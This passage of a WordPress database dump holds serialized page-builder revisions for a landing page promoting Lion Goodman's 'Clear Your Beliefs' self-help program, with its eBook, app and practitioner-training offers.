Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1220, 1695, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:588:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:882:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -25px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1215, 1692, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:588:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:904:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 8px; margin-bottom: -27px;">\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n  \n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1216, 1693, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:588:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:896:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 8px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" 